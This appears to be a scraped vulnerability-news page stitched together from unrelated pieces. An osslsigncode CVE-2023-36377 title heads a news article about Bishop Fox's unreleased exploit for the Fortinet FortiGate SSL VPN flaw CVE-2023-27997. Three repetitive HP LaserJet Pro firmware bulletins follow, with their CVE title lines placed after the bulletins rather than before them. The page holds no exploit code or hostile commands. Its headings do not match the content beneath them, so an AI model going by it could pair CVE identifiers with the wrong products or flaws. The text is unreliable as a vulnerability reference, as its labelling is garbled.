CVE-2023-36377: Comparing 2.2...2.3 · mtrojnar/osslsigncode

Some 340,000 FortiGate SSL VPN appliances remain exposed to the threat more than three weeks after Fortinet released firmware updates to address the issue.

Researchers have written exploit code for a critical remote code execution (RCE) vulnerability in Fortinet's FortiGate SSL VPNs that the vendor disclosed and patched in June 2023.

Bishop Fox's research team, which developed the exploit, has estimated there are some 340,000 affected FortiGate devices that are currently unpatched against the flaw and remain open to attack. That number is significantly higher than the 250,000 FortiGate devices that several researchers estimated were vulnerable to exploit when Fortinet first disclosed the flaw on June 12.

**Code Not Released Publicly — but There's a GIF**

"There are 490,000 affected \[FortiGate\] SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched," Bishop Fox's director of capability development, Caleb Gross, wrote in a blog post on June 30. "You should patch yours now."

The heap-based buffer overflow vulnerability, tracked as CVE-2023-27997, affects multiple versions of FortiOS and FortiProxy SSL-VPN software. It gives an unauthenticated, remote attacker a way to execute arbitrary code on an affected device and take complete control of it. Researchers from French cybersecurity firm Lexfo who discovered the flaw assessed it as affecting every single SSL VPN appliance running FortiOS.

Bishop Fox has not released its exploit code publicly. But its blog post has a GIF of it in use. Gross described the exploit that Bishop Fox has developed as giving attackers a way to open an interactive shell they could use to communicate with an affected FortiGate appliance.

"This exploit very closely follows the steps detailed in the original blog post by Lexfo, though we had to take a few extra steps that were not mentioned in that post," Gross wrote. "The exploit runs in approximately one second, which is significantly faster than the demo video on a 64-bit device shown by Lexfo."

Fortinet issued firmware updates that addressed the issue on June 12. At the time, the company said the flaw affected organizations in government, manufacturing and other critical infrastructure sectors. Fortinet said it was aware of an attacker exploiting the vulnerability in a limited number of cases.

Fortinet cautioned about the potential for threat actors like those behind the Volt Typhoon cyber-espionage campaign to abuse CVE-2023-27997. Volt Typhoon is a China-based group that is believed to have established persistent access on networks belonging to US telecom companies and other critical infrastructure organizations, for stealing sensitive data and carrying out other malicious actions. The campaign so far has primarily used another, older Fortinet flaw (CVE-2022-40684) for initial access. But organizations should not discount the possibility of Volt Typhoon — and other threat actors — using CVE-2023-27997 either, Fortinet warned.

**Why Security Appliances Make Popular Targets**

CVE-2023-27997 is one of numerous critical Fortinet vulnerabilities that have been exposed. Like that of almost every other firewall and VPN vendor, Fortinet's appliances are a popular target for adversaries because of the access they provide to enterprise networks.

The US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others have issued multiple advisories in recent years about the need for organizations to promptly address vulnerabilities in these and other network devices because of the high attacker interest in them.

In June 2022, for instance, CISA warned of China-sponsored threat actors actively targeting unpatched vulnerabilities in network devices from a wide range of vendors. The advisory included a list of the most common of these vulnerabilities. The list included vulnerabilities in products from Fortinet, Cisco, Citrix, Netgear, Pulse, QNAP, and Zyxel.

Systems administrators should patch as quickly as possible, even though patching firmware can be a bit more cumbersome when dealing with appliances that run application gateways, says Timothy Morris, chief security adviser at Tanium. Often, appliances such as those from Fortinet face the perimeter and have very high-availability requirements, meaning they have tight windows for change.

"For most organizations, a certain amount of downtime is probably inevitable," Morris says. Vulnerabilities such as CVE-2023-27997 require the full firmware image to be reloaded, so there is a certain amount of time and risk involved, he adds. "Configurations have to be backed up and restored to make sure they are working as expected."

Researchers Develop Exploit Code for Critical Fortinet VPN Bug

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow and/or Denial of Service when using the backup & restore feature through the embedded web service on the device.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow and/or Denial of Service when using the backup & restore feature through the embedded web service on the device.

Severity

High

HP Reference

HPSBPI03852 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** hoangha2 (ZDI-CAN-19693)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35176

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0059

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-35176: Certain HP LaserJet Pro Print Products – Potential Buffer Overflow and/or Denial of Service

Certain HP LaserJet Pro print products are potentially vulnerable to a stack-based buffer overflow related to the compact font format parser.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to a stack-based buffer overflow related to the compact font format parser.

Severity

High

HP Reference

HPSBPI03853 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** Interrupt Labs (ZDI-CAN-19707)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35177

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0060

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-35177: Certain HP LaserJet Pro Print Products - Potential Buffer Overflow

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow when performing a GET request to scan jobs.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP LaserJet Pro print products are potentially vulnerable to Buffer Overflow when performing a GET request to scan jobs.

Severity

High

HP Reference

HPSBPI03854 rev.01

Release date

June 22, 2023

Last updated

June 22, 2023

Category

Print

Potential Security Impact

Potential Buffer Overflow, Denial of Service

**Relevant Common Vulnerabilities and Exposures (CVE) List**

**Reported by:** Bugscale (ZDI-CAN-19765)

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-35178

8.8

High

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0061

**Resolution**

Update the printer firmware.

HP has provided an updated firmware resolution for potentially affected products listed in the table below. To obtain the updated firmware, go to the HP Customer Support - Software and Driver Downloads, and then search for your printer model.

**Affected LaserJet Pro printers**

Find the products affected and the firmware version that resolves the vulnerabilities.

Affected products    

Product Name

Product Number

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

002\_2322C or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

002\_2322C or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

002\_2322C or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

002\_2322C or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

002\_2322C or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 22, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Tag

#buffer_overflow